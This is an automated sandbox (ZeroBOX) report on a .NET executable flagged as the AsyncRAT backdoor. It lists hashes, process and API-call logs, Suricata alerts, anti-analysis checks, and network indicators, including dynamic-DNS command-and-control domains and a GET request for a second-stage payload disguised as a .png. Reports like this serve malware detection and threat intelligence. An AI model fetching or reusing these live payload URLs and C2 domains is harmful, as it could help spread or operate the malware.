Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Jan. 27, 2022, 4:26 p.m.	Jan. 27, 2022, 4:28 p.m.

Size	37.5KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`aff5022ad656052e19056b72a8bb07b5`
SHA256	`a1cec8cc4e948fec08ecfbf383f76b880be3d24803c9139e1ba70db70eb8d8c3`
CRC32	`8D0F2B2C`
ssdeep	`768:3ePK4A11HvJdaOz4UJOf9K0K13OTwCzyl3:3ePK42FvJ/IFK1jIyd`
Yara	PE_Header_Zero - PE File Signature Generic_Malware_Zero - Generic Malware IsPE32 - (no description) Is_DotNET_EXE - (no description) Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT

aguywfrvgqg.exe "C:\Users\test22\AppData\Local\Temp\aguywfrvgqg.exe"
2428
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==
  2552

Name	Response	Post-Analysis Lookup
studentesting.duckdns.org	A 136.144.41.66	136.144.41.66
oplktoupinarina.sytes.net	A 136.144.41.66	136.144.41.66
ip-api.com	A 208.95.112.1	208.95.112.1

IP Address	Status	Action
136.144.41.66	Active	Moloch
164.124.101.2	Active	Moloch
208.95.112.1	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49163 -> 136.144.41.66:80	2018219	ET INFO DYNAMIC_DNS HTTP Request to a *.sytes.net Domain	Potentially Bad Traffic
TCP 192.168.56.103:49166 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
UDP 192.168.56.103:63183 -> 164.124.101.2:53	2022918	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain	Misc activity

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW Jan. 27, 2022, 4:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 27, 2022, 4:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 27, 2022, 4:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 27, 2022, 4:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Jan. 27, 2022, 4:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 27, 2022, 4:26 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Jan. 27, 2022, 4:26 p.m.			0	0
IsDebuggerPresent Jan. 27, 2022, 4:26 p.m.			0	0
IsDebuggerPresent Jan. 27, 2022, 4:26 p.m.			0	0

Uses Windows APIs to generate a cryptographic key (44 events)

Time & API	Arguments	Status	Return
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f3d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f3d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f490 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f490 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037e528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037eaa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037eaa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037eaa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037eca8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037eca8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037eca8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037eca8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037eca8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037eca8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037eaa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037eaa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037eaa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037e0e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037e0e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037e0e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037e9a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037e0e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037e0e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037e0e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037e0e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037e0e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037e0e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037e0e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037ee28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037ee28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037ee28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037ee28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037ee28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037ee28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037ee28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037ee28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037ee28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037ee28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037ee28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037ee28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037ee28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037ee28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037ed68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 27, 2022, 4:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0037ed68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Jan. 27, 2022, 4:26 p.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Jan. 27, 2022, 4:27 p.m.	stacktrace: K32EnumProcessModules+0x18 RegisterApplicationRestart-0x1be kernel32+0x3b37e @ 0x7689b37e 0x58abead 0x4c11e02 0x4bf8a97 0x4bfa7ac 0x4bfa466 0x4bf79f4 0x4bf7941 0x4bf78a8 0x57108d4 0x571075c 0x5710415 0x4bf79f4 0x4bf7941 0x4bf78a8 0x57108d4 0x571075c 0x5710415 0x4bf79f4 0x4bf7941 0x4bf78a8 0x57108d4 0x571075c 0x5710415 0x4bf79f4 0x4bf7941 0x4bf78a8 0x4bf0739 0x4bf06fb 0x4bf06bd 0x4bfe46a DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73942652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7395264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x739c1838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x739c1737 mscorlib+0x2d3711 @ 0x722a3711 mscorlib+0x308f2d @ 0x722d8f2d 0x5f0893 0x5f01a1 0x5f0084 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7395264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73952e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x73a074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73a07610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73a91dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73a91e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73a91f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x73a9416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73fef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74277f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74274de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 89 04 91 c7 45 fc fe ff ff ff ff 45 10 81 7d 10 exception.symbol: K32EnumProcessModules+0x113 RegisterApplicationRestart-0xc3 kernel32+0x3b479 exception.instruction: mov dword ptr [ecx + edx*4], eax exception.module: KERNEL32.dll exception.exception_code: 0xc0000005 exception.offset: 242809 exception.address: 0x7689b479 registers.esp: 3466028 registers.edi: 1987043272 registers.eax: 20512768 registers.ebp: 3466232 registers.edx: 0 registers.ebx: 0 registers.esi: 1 registers.ecx: 0	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Jan. 27, 2022, 4:27 p.m.

stacktrace:

K32EnumProcessModules+0x18 RegisterApplicationRestart-0x1be kernel32+0x3b37e @ 0x7689b37e
0x58abead
0x4c11e02
0x4bf8a97
0x4bfa7ac
0x4bfa466
0x4bf79f4
0x4bf7941
0x4bf78a8
0x57108d4
0x571075c
0x5710415
0x4bf79f4
0x4bf7941
0x4bf78a8
0x57108d4
0x571075c
0x5710415
0x4bf79f4
0x4bf7941
0x4bf78a8
0x57108d4
0x571075c
0x5710415
0x4bf79f4
0x4bf7941
0x4bf78a8
0x4bf0739
0x4bf06fb
0x4bf06bd
0x4bfe46a
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73942652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7395264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x739c1838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x739c1737
mscorlib+0x2d3711 @ 0x722a3711
mscorlib+0x308f2d @ 0x722d8f2d
0x5f0893
0x5f01a1
0x5f0084
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7395264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73952e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x73a074ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73a07610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73a91dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73a91e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73a91f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x73a9416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73fef5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74277f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74274de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5

exception.instruction_r: 89 04 91 c7 45 fc fe ff ff ff ff 45 10 81 7d 10
exception.symbol: K32EnumProcessModules+0x113 RegisterApplicationRestart-0xc3 kernel32+0x3b479
exception.instruction: mov dword ptr [ecx + edx*4], eax
exception.module: KERNEL32.dll
exception.exception_code: 0xc0000005
exception.offset: 242809
exception.address: 0x7689b479
registers.esp: 3466028
registers.edi: 1987043272
registers.eax: 20512768
registers.ebp: 3466232
registers.edx: 0
registers.ebx: 0
registers.esi: 1
registers.ecx: 0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET http://oplktoupinarina.sytes.net/gryfgc/Quckbicyh.png

Connects to a Dynamic DNS Domain (2 events)

domain	oplktoupinarina.sytes.net
domain	studentesting.duckdns.org

Performs some HTTP requests (2 events)

request	GET http://oplktoupinarina.sytes.net/gryfgc/Quckbicyh.png
request	GET http://ip-api.com/json/

Allocates read-write-execute memory (usually to unpack itself) (50 out of 213 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 262144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00350000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00350000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73941000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73942000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 458752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00530000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00560000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00425000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0042b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00427000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0040c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0041a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00417000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00416000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0041b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003fc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0040d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0040e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 12288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005f1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0040f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05e40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 36864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005fd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005fe000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005ff000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
